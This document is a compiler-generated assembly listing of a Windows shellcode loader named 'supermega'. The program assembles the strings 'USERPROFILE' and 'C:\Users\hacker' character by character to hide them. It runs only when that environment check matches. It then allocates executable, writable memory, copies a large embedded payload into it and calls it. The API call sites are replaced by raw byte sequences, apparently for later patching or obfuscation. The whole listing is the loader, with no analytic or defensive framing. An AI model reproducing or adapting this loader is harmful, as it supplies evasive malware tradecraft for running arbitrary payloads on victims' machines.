; Listing generated by Microsoft (R) Optimizing Compiler Version 19.37.32822.0 include listing.inc INCLUDELIB LIBCMT INCLUDELIB OLDNAMES _DATA SEGMENT COMM supermega_payload:QWORD _DATA ENDS PUBLIC main PUBLIC mystrcmp EXTRN __imp_GetEnvironmentVariableW:PROC EXTRN __imp_VirtualAlloc:PROC pdata SEGMENT $pdata$main DD imagerel $LN8 DD imagerel $LN8+453 DD imagerel $unwind$main $pdata$mystrcmp DD imagerel $LN6 DD imagerel $LN6+109 DD imagerel $unwind$mystrcmp pdata ENDS xdata SEGMENT $unwind$main DD 020701H DD 010f0107H $unwind$mystrcmp DD 010e01H DD 0220eH xdata ENDS ; Function compile flags: /Odtp _TEXT SEGMENT i$ = 0 str1$ = 32 str2$ = 40 mystrcmp PROC ; File C:\Users\hacker\source\repos\supermega\build\main.c ; Line 37 $LN6: mov QWORD PTR [rsp+16], rdx mov QWORD PTR [rsp+8], rcx sub rsp, 24 ; Line 38 mov DWORD PTR i$[rsp], 0 $LN2@mystrcmp: ; Line 39 movsxd rax, DWORD PTR i$[rsp] mov rcx, QWORD PTR str1$[rsp] movzx eax, WORD PTR [rcx+rax*2] test eax, eax je SHORT $LN3@mystrcmp movsxd rax, DWORD PTR i$[rsp] mov rcx, QWORD PTR str2$[rsp] movzx eax, WORD PTR [rcx+rax*2] test eax, eax je SHORT $LN3@mystrcmp ; Line 40 movsxd rax, DWORD PTR i$[rsp] mov rcx, QWORD PTR str1$[rsp] movzx eax, WORD PTR [rcx+rax*2] movsxd rcx, DWORD PTR i$[rsp] mov rdx, QWORD PTR str2$[rsp] movzx ecx, WORD PTR [rdx+rcx*2] cmp eax, ecx je SHORT $LN4@mystrcmp ; Line 41 mov eax, 1 jmp SHORT $LN1@mystrcmp $LN4@mystrcmp: ; Line 43 mov eax, DWORD PTR i$[rsp] inc eax mov DWORD PTR i$[rsp], eax ; Line 44 jmp SHORT $LN2@mystrcmp $LN3@mystrcmp: ; Line 45 xor eax, eax $LN1@mystrcmp: ; Line 46 add rsp, 24 ret 0 mystrcmp ENDP _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT n$1 = 32 envVarName$ = 40 tocheck$ = 64 result$ = 96 dest$ = 104 buffer$ = 112 main PROC ; File C:\Users\hacker\source\repos\supermega\build\main.c ; Line 6 $LN8: sub rsp, 2168 ; 00000878H ; Line 8 mov eax, 85 ; 00000055H mov WORD PTR envVarName$[rsp], ax mov eax, 83 ; 00000053H mov WORD PTR envVarName$[rsp+2], ax mov eax, 69 ; 00000045H mov WORD PTR envVarName$[rsp+4], ax mov eax, 82 ; 00000052H mov WORD PTR envVarName$[rsp+6], ax mov eax, 80 ; 00000050H mov WORD PTR envVarName$[rsp+8], ax mov eax, 82 ; 00000052H mov WORD PTR envVarName$[rsp+10], ax mov eax, 79 ; 0000004fH mov WORD PTR envVarName$[rsp+12], ax mov eax, 70 ; 00000046H mov WORD PTR envVarName$[rsp+14], ax mov eax, 73 ; 00000049H mov WORD PTR envVarName$[rsp+16], ax mov eax, 76 ; 0000004cH mov WORD PTR envVarName$[rsp+18], ax mov eax, 69 ; 00000045H mov WORD PTR envVarName$[rsp+20], ax xor eax, eax mov WORD PTR envVarName$[rsp+22], ax ; Line 9 mov eax, 67 ; 00000043H mov WORD PTR tocheck$[rsp], ax mov eax, 58 ; 0000003aH mov WORD PTR tocheck$[rsp+2], ax mov eax, 92 ; 0000005cH mov WORD PTR tocheck$[rsp+4], ax mov eax, 85 ; 00000055H mov WORD PTR tocheck$[rsp+6], ax mov eax, 115 ; 00000073H mov WORD PTR tocheck$[rsp+8], ax mov eax, 101 ; 00000065H mov WORD PTR tocheck$[rsp+10], ax mov eax, 114 ; 00000072H mov WORD PTR tocheck$[rsp+12], ax mov eax, 115 ; 00000073H mov WORD PTR tocheck$[rsp+14], ax mov eax, 92 ; 0000005cH mov WORD PTR tocheck$[rsp+16], ax mov eax, 104 ; 00000068H mov WORD PTR tocheck$[rsp+18], ax mov eax, 97 ; 00000061H mov WORD PTR tocheck$[rsp+20], ax mov eax, 99 ; 00000063H mov WORD PTR tocheck$[rsp+22], ax mov eax, 107 ; 0000006bH mov WORD PTR tocheck$[rsp+24], ax mov eax, 101 ; 00000065H mov WORD PTR tocheck$[rsp+26], ax mov eax, 114 ; 00000072H mov WORD PTR tocheck$[rsp+28], ax xor eax, eax mov WORD PTR tocheck$[rsp+30], ax ; Line 11 mov r8d, 1024 ; 00000400H lea rdx, QWORD PTR buffer$[rsp] lea rcx, QWORD PTR envVarName$[rsp] DB 0a0H, 093H, 061H, 037H, 05bH, 070H mov DWORD PTR result$[rsp], eax ; Line 12 cmp DWORD PTR result$[rsp], 0 jne SHORT $LN5@main ; Line 13 mov eax, 6 jmp SHORT $LN1@main $LN5@main: ; Line 15 lea rdx, QWORD PTR tocheck$[rsp] lea rcx, QWORD PTR buffer$[rsp] call mystrcmp test eax, eax je SHORT $LN6@main ; Line 16 mov eax, 6 jmp SHORT $LN1@main $LN6@main: ; Line 21 mov r9d, 64 ; 00000040H mov r8d, 12288 ; 00003000H mov edx, 4096 ; 00001000H xor ecx, ecx DB 0b0H, 008H, 001H, 07eH, 0dfH, 06aH mov QWORD PTR dest$[rsp], rax ; Line 27 mov DWORD PTR n$1[rsp], 0 jmp SHORT $LN4@main $LN2@main: mov eax, DWORD PTR n$1[rsp] inc eax mov DWORD PTR n$1[rsp], eax $LN4@main: cmp DWORD PTR n$1[rsp], 11223344 ; 00ab4130H jge SHORT $LN3@main ; Line 28 movsxd rax, DWORD PTR n$1[rsp] movsxd rcx, DWORD PTR n$1[rsp] mov rdx, QWORD PTR dest$[rsp] mov r8, QWORD PTR supermega_payload movzx eax, BYTE PTR [r8+rax] mov BYTE PTR [rdx+rcx], al ; Line 29 jmp SHORT $LN2@main $LN3@main: ; Line 32 call QWORD PTR dest$[rsp] ; Line 34 xor eax, eax $LN1@main: ; Line 35 add rsp, 2168 ; 00000878H ret 0 main ENDP _TEXT ENDS END